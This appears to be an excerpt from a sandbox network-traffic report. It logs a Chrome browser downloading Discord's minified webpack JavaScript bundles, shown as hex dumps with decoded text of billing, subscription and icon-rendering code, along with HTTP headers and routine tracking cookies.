                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 22 53 4b 55 5f 46 45 54 43 48 5f 53 55 43 43 45 53 53 22 2c 73 6b 75 3a 6e 3f 75 2e 62 6f 64 79 3a 75 2e 62 6f 64 79 2e 73 6b 75 7d 29 7d 63 61 74 63 68 28 74 29 7b 74 68 72 6f 77 20 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 53 4b 55 5f 46 45 54 43 48 5f 46 41 49 4c 22 2c 73 6b 75 49 64 3a 65 7d 29 2c 6e 65 77 20 61 2e 64 65 66 61 75 6c 74 28 22 46 61 69 6c 65 64 20 74 6f 20 66 65 74 63 68 20 53 4b 55 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 7d 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 41 28 74 29 7b 6c 65 74 20 65 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 7c 7c 61 72 67 75 6d 65 6e 74 73 5b 31 5d 2c 6e 3d 63 2e 64 65 66
                                                                          Data Ascii: "SKU_FETCH_SUCCESS",sku:n?u.body:u.body.sku})}catch(t){throw i.default.dispatch({type:"SKU_FETCH_FAIL",skuId:e}),new a.default("Failed to fetch SKU ".concat(e))}}}async function A(t){let e=!(arguments.length>1)||void 0===arguments[1]||arguments[1],n=c.def
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 74 69 74 6c 65 6d 65 6e 74 73 3a 74 2e 62 6f 64 79 2c 6c 69 62 72 61 72 79 41 70 70 6c 69 63 61 74 69 6f 6e 73 3a 5b 5d 7d 29 2c 74 2e 62 6f 64 79 7d 63 61 74 63 68 28 75 29 7b 6c 65 74 20 65 3d 6e 65 77 20 72 2e 42 69 6c 6c 69 6e 67 45 72 72 6f 72 28 75 29 3b 74 68 72 6f 77 20 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 53 4b 55 5f 50 55 52 43 48 41 53 45 5f 46 41 49 4c 22 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 74 2c 73 6b 75 49 64 3a 6e 2c 65 72 72 6f 72 3a 65 7d 29 2c 65 7d 7d 6c 65 74 20 50 3d 7b 69 73 47 69 66 74 3a 21 31 7d 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 4e 28 74 2c 65 2c 6e 29 7b 6c 65 74 7b 70 61 79 6d 65 6e 74 53 6f 75 72 63 65 3a 61 2c 65 78 70 65 63 74 65 64 41 6d 6f 75 6e 74 3a 73 2c 65
                                                                          Data Ascii: titlements:t.body,libraryApplications:[]}),t.body}catch(u){let e=new r.BillingError(u);throw i.default.dispatch({type:"SKU_PURCHASE_FAIL",applicationId:t,skuId:n,error:e}),e}}let P={isGift:!1};async function N(t,e,n){let{paymentSource:a,expectedAmount:s,e
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 3f 76 6f 69 64 20 30 3a 4c 2e 73 75 72 72 6f 67 61 74 65 73 2c 73 6f 75 6e 64 5f 69 64 3a 6e 75 6c 6c 3d 3d 4d 3f 76 6f 69 64 20 30 3a 4d 2e 73 6f 75 6e 64 49 64 7d 29 29 2c 74 2e 70 75 72 63 68 61 73 65 5f 74 6f 6b 65 6e 3d 28 30 2c 45 2e 67 65 74 50 75 72 63 68 61 73 65 54 6f 6b 65 6e 29 28 29 7d 6c 65 74 20 6e 3d 61 77 61 69 74 20 75 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 54 2e 45 6e 64 70 6f 69 6e 74 73 2e 53 54 4f 52 45 5f 53 4b 55 5f 50 55 52 43 48 41 53 45 28 65 29 2c 62 6f 64 79 3a 74 2c 63 6f 6e 74 65 78 74 3a 7b 6c 6f 61 64 5f 69 64 3a 49 7d 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 3b 72 65 74 75 72 6e 20 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 53 4b 55 5f 50 55 52 43 48 41
                                                                          Data Ascii: ?void 0:L.surrogates,sound_id:null==M?void 0:M.soundId})),t.purchase_token=(0,E.getPurchaseToken)()}let n=await u.default.post({url:T.Endpoints.STORE_SKU_PURCHASE(e),body:t,context:{load_id:I},oldFormErrors:!0});return i.default.dispatch({type:"SKU_PURCHA
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 28 28 29 3d 3e 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 53 4b 55 5f 50 55 52 43 48 41 53 45 5f 53 48 4f 57 5f 43 4f 4e 46 49 52 4d 41 54 49 4f 4e 5f 53 54 45 50 22 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 74 29 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 53 4b 55 5f 50 55 52 43 48 41 53 45 5f 55 50 44 41 54 45 5f 49 53 5f 47 49 46 54 22 2c 69 73 47 69 66 74 3a 74 7d 29 7d 7d 2c 35 39 38 39 38 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 76 61 72 20 75 3d 6e 28 22 36 35 35 39 37 22 29 2c 69 3d 6e 28
                                                                          Data Ascii: (()=>i.default.dispatch({type:"SKU_PURCHASE_SHOW_CONFIRMATION_STEP"}))}function M(t){i.default.dispatch({type:"SKU_PURCHASE_UPDATE_IS_GIFT",isGift:t})}},598981:function(t,e,n){"use strict";n.r(e),n.d(e,{default:function(){return r}});var u=n("65597"),i=n(
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 7b 74 79 70 65 3a 22 41 50 50 4c 49 43 41 54 49 4f 4e 5f 53 55 42 53 43 52 49 50 54 49 4f 4e 53 5f 46 45 54 43 48 5f 4c 49 53 54 49 4e 47 53 22 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 74 7d 29 3b 74 72 79 7b 6c 65 74 20 6e 3d 61 77 61 69 74 20 72 2e 67 65 74 41 70 70 6c 69 63 61 74 69 6f 6e 53 75 62 73 63 72 69 70 74 69 6f 6e 47 72 6f 75 70 4c 69 73 74 69 6e 67 73 46 6f 72 41 70 70 6c 69 63 61 74 69 6f 6e 28 74 2c 65 29 3b 72 65 74 75 72 6e 20 75 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 41 50 50 4c 49 43 41 54 49 4f 4e 5f 53 55 42 53 43 52 49 50 54 49 4f 4e 53 5f 46 45 54 43 48 5f 4c 49 53 54 49 4e 47 53 5f 53 55 43 43 45 53 53 22 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 74 2c 67 72 6f 75 70 4c 69 73 74 69 6e 67
                                                                          Data Ascii: {type:"APPLICATION_SUBSCRIPTIONS_FETCH_LISTINGS",applicationId:t});try{let n=await r.getApplicationSubscriptionGroupListingsForApplication(t,e);return u.default.dispatch({type:"APPLICATION_SUBSCRIPTIONS_FETCH_LISTINGS_SUCCESS",applicationId:t,groupListing


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          292192.168.2.550027162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:15 UTC866OUTGET /assets/56145.ca77ff8c50f941ccf356.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=vJps2MJak7qXWd7GhqlJPSUfdodRQBf0okz7bFIiceQ-1702226715413-0-604800000
                                                                          2023-12-10 16:45:16 UTC968INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 31 33 33 34 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 65 65 63 66 35 31 32 37 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:16 GMTContent-Type: application/javascriptContent-Length: 213346Connection: closeCF-Ray: 8336f50eecf51277-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 35 36 31 34 35 22 5d 2c 7b 37 37 37 34 38 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 6c 3d 7b 22 2e 2f 69 63 6f 6e 2d 66 69 6c 65 2d 61 63 72 6f 62 61 74 2e 73 76 67 22 3a 22 36 36 38 39 37 33 22 2c 22 2e 2f 69 63 6f 6e 2d 66 69 6c 65 2d 61 65 2e 73 76 67 22 3a 22 31 32 34 30 33 36 22 2c 22 2e 2f 69 63 6f 6e 2d 66 69 6c 65 2d 61 69 2e 73 76 67 22 3a 22 37 32 31 35 36 39 22 2c 22 2e 2f 69 63 6f 6e 2d 66 69 6c 65 2d 61 72 63 68 69 76 65 2e 73 76 67 22 3a 22 36 34 34 32 38 36 22 2c 22 2e 2f 69 63 6f 6e 2d 66 69 6c 65 2d 61
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["56145"],{777483:function(e,t,n){var l={"./icon-file-acrobat.svg":"668973","./icon-file-ae.svg":"124036","./icon-file-ai.svg":"721569","./icon-file-archive.svg":"644286","./icon-file-a
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 30 25 32 30 34 32 48 31 37 39 43 31 38 31 2e 32 30 39 25 32 30 34 32 25 32 30 31 38 33 25 32 30 34 30 2e 32 30 39 31 25 32 30 31 38 33 25 32 30 33 38 56 32 38 43 31 38 33 25 32 30 32 35 2e 37 39 30 39 25 32 30 31 38 31 2e 32 30 39 25 32 30 32 34 25 32 30 31 37 39 25 32 30 32 34 48 31 31 30 5a 4d 31 30 36 25 32 30 35 38 43 31 30 36 25 32 30 35 35 2e 37 39 30 39 25 32 30 31 30 37 2e 37 39 31 25 32 30 35 34 25 32 30 31 31 30 25 32 30 35 34 48 32 38 34 43 32 38 36 2e 32 30 39 25 32 30 35 34 25 32 30 32 38 38 25 32 30 35 35 2e 37 39 30 39 25 32 30 32 38 38 25 32 30 35 38 56 36 38 43 32 38 38 25 32 30 37 30 2e 32 30 39 31 25 32 30 32 38 36 2e 32 30 39 25 32 30 37 32 25 32 30 32 38 34 25 32 30 37 32 48 31 31 30 43 31 30 37 2e 37 39 31 25 32 30 37 32 25 32 30 31
                                                                          Data Ascii: 0%2042H179C181.209%2042%20183%2040.2091%20183%2038V28C183%2025.7909%20181.209%2024%20179%2024H110ZM106%2058C106%2055.7909%20107.791%2054%20110%2054H284C286.209%2054%20288%2055.7909%20288%2058V68C288%2070.2091%20286.209%2072%20284%2072H110C107.791%2072%201
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 68 75 6d 62 6e 61 69 6c 50 6c 61 63 65 68 6f 6c 64 65 72 3a 6e 7d 3d 74 3b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 6c 65 74 7b 61 6c 74 3a 61 2c 73 72 63 3a 72 2c 6f 72 69 67 69 6e 61 6c 3a 6f 2c 77 69 64 74 68 3a 64 2c 68 65 69 67 68 74 3a 63 2c 61 6e 69 6d 61 74 65 64 3a 70 2c 63 68 69 6c 64 72 65 6e 3a 67 2c 72 65 6e 64 65 72 4c 69 6e 6b 43 6f 6d 70 6f 6e 65 6e 74 3a 43 2c 69 73 57 69 6e 64 6f 77 46 6f 63 75 73 65 64 3a 45 2c 73 68 6f 75 6c 64 48 69 64 65 4d 65 64 69 61 4f 70 74 69 6f 6e 73 3a 76 3d 21 31 7d 3d 74 68 69 73 2e 70 72 6f 70 73 2c 49 3d 7b 61 6c 74 3a 61 2c 73 72 63 3a 72 2c 6f 72 69 67 69 6e 61 6c 3a 6e 75 6c 6c 21 3d 6f 3f 6f 3a 72 2c 77 69 64 74 68 3a 64 2c 68 65 69 67 68 74 3a 63 2c 61 6e 69 6d 61 74 65 64 3a 70 2c 63
                                                                          Data Ascii: humbnailPlaceholder:n}=t;e.preventDefault();let{alt:a,src:r,original:o,width:d,height:c,animated:p,children:g,renderLinkComponent:C,isWindowFocused:E,shouldHideMediaOptions:v=!1}=this.props,I={alt:a,src:r,original:null!=o?o:r,width:d,height:c,animated:p,c
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 22 33 37 39 38 33 22 29 3b 6e 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 61 3d 6e 28 22 36 36 39 34 39 31 22 29 2c 73 3d 6e 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 69 3d 65 3d 3e 7b 6c 65 74 7b 77 69 64 74 68 3a 74 3d 32 34 2c 68 65 69 67 68 74 3a 6e 3d 32 34 2c 63 6f 6c 6f 72 3a 69 3d 61 2e 64 65 66 61 75 6c 74 2e 63 6f 6c 6f 72 73 2e 49 4e 54 45 52 41 43 54 49 56 45 5f 4e 4f 52 4d 41 4c 2c 63 6f 6c 6f 72 43 6c 61 73 73 3a 72 3d 22 22 2c 2e 2e 2e 6f 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 6c 2e 6a 73 78 29 28 22 73 76 67 22 2c 7b 2e 2e 2e 28 30 2c 73 2e 64 65 66 61 75 6c 74 29 28 6f 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77
                                                                          Data Ascii: eturn i}});var l=n("37983");n("884691");var a=n("669491"),s=n("75196");let i=e=>{let{width:t=24,height:n=24,color:i=a.default.colors.INTERACTIVE_NORMAL,colorClass:r="",...o}=e;return(0,l.jsx)("svg",{...(0,s.default)(o),xmlns:"http://www.w3.org/2000/svg",w
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 20 31 20 34 2e 34 32 20 34 2e 34 32 6c 2d 36 2e 32 34 20 36 2e 32 34 61 35 2e 32 34 20 35 2e 32 34 20 30 20 30 20 31 2d 37 2e 34 32 2d 37 2e 34 32 6c 38 2e 30 32 2d 38 2e 30 32 5a 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 72 7d 29 7d 29 7d 7d 2c 34 39 39 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 43 69 72 63 6c 65 50 6c 61 79 49 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 22 33 37 39 38 33 22 29 3b 6e 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 61 3d 6e 28 22 36 36 39 34 39 31 22 29 2c 73 3d 6e 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 69 3d 65 3d 3e 7b 6c 65 74 7b 77 69 64 74 68 3a 74 3d 32 34 2c 68 65 69 67
                                                                          Data Ascii: 1 4.42 4.42l-6.24 6.24a5.24 5.24 0 0 1-7.42-7.42l8.02-8.02Z",className:r})})}},4997:function(e,t,n){"use strict";n.r(t),n.d(t,{CirclePlayIcon:function(){return i}});var l=n("37983");n("884691");var a=n("669491"),s=n("75196");let i=e=>{let{width:t=24,heig
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 35 48 31 30 61 36 20 36 20 30 20 30 20 30 2d 36 20 36 76 35 2e 35 61 2e 35 2e 35 20 30 20 30 20 31 2d 2e 35 2e 35 48 33 5a 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 72 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 69 3f 69 3a 69 2e 63 73 73 2c 64 3a 22 4d 36 20 31 38 61 34 20 34 20 30 20 30 20 30 20 34 20 34 68 38 61 34 20 34 20 30 20 30 20 30 20 34 2d 34 76 2d 34 68 2d 33 61 35 20 35 20 30 20 30 20 31 2d 35 2d 35 56 36 68 2d 34 61 34 20 34 20 30 20 30 20 30 2d 34 20 34 76 38 5a 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 72 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 69 3f 69 3a 69 2e 63 73 73 2c 64 3a
                                                                          Data Ascii: 5H10a6 6 0 0 0-6 6v5.5a.5.5 0 0 1-.5.5H3Z",className:r}),(0,l.jsx)("path",{fill:"string"==typeof i?i:i.css,d:"M6 18a4 4 0 0 0 4 4h8a4 4 0 0 0 4-4v-4h-3a5 5 0 0 1-5-5V6h-4a4 4 0 0 0-4 4v8Z",className:r}),(0,l.jsx)("path",{fill:"string"==typeof i?i:i.css,d:
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 69 3f 69 3a 69 2e 63 73 73 2c 64 3a 22 4d 31 35 2e 35 36 20 31 31 2e 37 37 63 2e 32 2d 2e 31 2e 34 34 2e 30 32 2e 34 34 2e 32 33 61 34 20 34 20 30 20 31 20 31 2d 34 2d 34 63 2e 32 31 20 30 20 2e 33 33 2e 32 35 2e 32 33 2e 34 34 61 32 2e 35 20 32 2e 35 20 30 20 30 20 30 20 33 2e 33 32 20 33 2e 33 32 5a 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 72 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 69 3f 69 3a 69 2e 63 73 73 2c 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 32 32 2e 38 39 20 31 31 2e 37 63 2e 30 37 2e 32 2e 30 37 2e 34 20 30 20 2e 36 43 32 32 2e 32 37 20 31 33
                                                                          Data Ascii: "path",{fill:"string"==typeof i?i:i.css,d:"M15.56 11.77c.2-.1.44.02.44.23a4 4 0 1 1-4-4c.21 0 .33.25.23.44a2.5 2.5 0 0 0 3.32 3.32Z",className:r}),(0,l.jsx)("path",{fill:"string"==typeof i?i:i.css,fillRule:"evenodd",d:"M22.89 11.7c.07.2.07.4 0 .6C22.27 13
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 65 3a 72 7d 29 7d 29 7d 7d 2c 34 38 35 33 35 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 46 75 6c 6c 73 63 72 65 65 6e 45 78 69 74 49 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 22 33 37 39 38 33 22 29 3b 6e 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 61 3d 6e 28 22 36 36 39 34 39 31 22 29 2c 73 3d 6e 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 69 3d 65 3d 3e 7b 6c 65 74 7b 77 69 64 74 68 3a 74 3d 32 34 2c 68 65 69 67 68 74 3a 6e 3d 32 34 2c 63 6f 6c 6f 72 3a 69 3d 61 2e 64 65 66 61 75 6c 74 2e 63 6f 6c 6f 72 73 2e 49 4e 54 45 52 41 43 54 49 56 45 5f 4e 4f 52 4d 41 4c 2c 63 6f 6c 6f 72 43 6c 61 73 73 3a 72
                                                                          Data Ascii: e:r})})}},485358:function(e,t,n){"use strict";n.r(t),n.d(t,{FullscreenExitIcon:function(){return i}});var l=n("37983");n("884691");var a=n("669491"),s=n("75196");let i=e=>{let{width:t=24,height:n=24,color:i=a.default.colors.INTERACTIVE_NORMAL,colorClass:r
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 2e 35 39 6c 35 2e 33 2d 35 2e 33 61 31 20 31 20 30 20 30 20 31 20 31 2e 34 20 31 2e 34 32 4c 35 2e 34 32 20 32 30 5a 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 72 7d 29 7d 29 7d 7d 2c 38 32 38 35 31 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 50 61 75 73 65 49 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 22 33 37 39 38 33 22 29 3b 6e 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 61 3d 6e 28 22 36 36 39 34 39 31 22 29 2c 73 3d 6e 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 69 3d 65 3d 3e 7b 6c 65 74 7b 77 69 64 74 68 3a 74 3d 32 34 2c 68 65 69 67 68 74 3a 6e 3d 32 34 2c 63 6f 6c 6f 72 3a 69 3d 61 2e 64 65 66 61 75 6c
                                                                          Data Ascii: .59l5.3-5.3a1 1 0 0 1 1.4 1.42L5.42 20Z",className:r})})}},828516:function(e,t,n){"use strict";n.r(t),n.d(t,{PauseIcon:function(){return i}});var l=n("37983");n("884691");var a=n("669491"),s=n("75196");let i=e=>{let{width:t=24,height:n=24,color:i=a.defaul


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          293192.168.2.550028162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:15 UTC866OUTGET /assets/58247.6146ce4a4e300aea8b79.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=NJDkhq7B.ZSGc6Fu1xeHwfw3lX8us_kYwGihA6TD490-1702226715443-0-604800000
                                                                          2023-12-10 16:45:16 UTC972INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 36 35 34 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 65 66 61 31 64 30 39 39 32 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:16 GMTContent-Type: application/javascriptContent-Length: 156540Connection: closeCF-Ray: 8336f50efa1d0992-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:16 UTC397INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 35 38 32 34 37 22 5d 2c 7b 31 34 32 32 32 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6c 2e 70 2b 22 62 39 32 33 37 38 30 31 32 61 36 62 36 36 34 63 30 31 62 36 2e 70 6e 67 22 7d 2c 34 34 39 32 33 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6c 2e 70 2b 22 39 30 34 30 39 31 35 31 36 63 35 65 38 38 34 38 30 66 34 37 2e 70 6e 67 22 7d 2c 32 39 30 39 33 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["58247"],{142226:function(e,t,l){"use strict";e.exports=l.p+"b92378012a6b664c01b6.png"},449236:function(e,t,l){"use strict";e.exports=l.p+"904091516c5e88480f47.png"},290938:function(e,
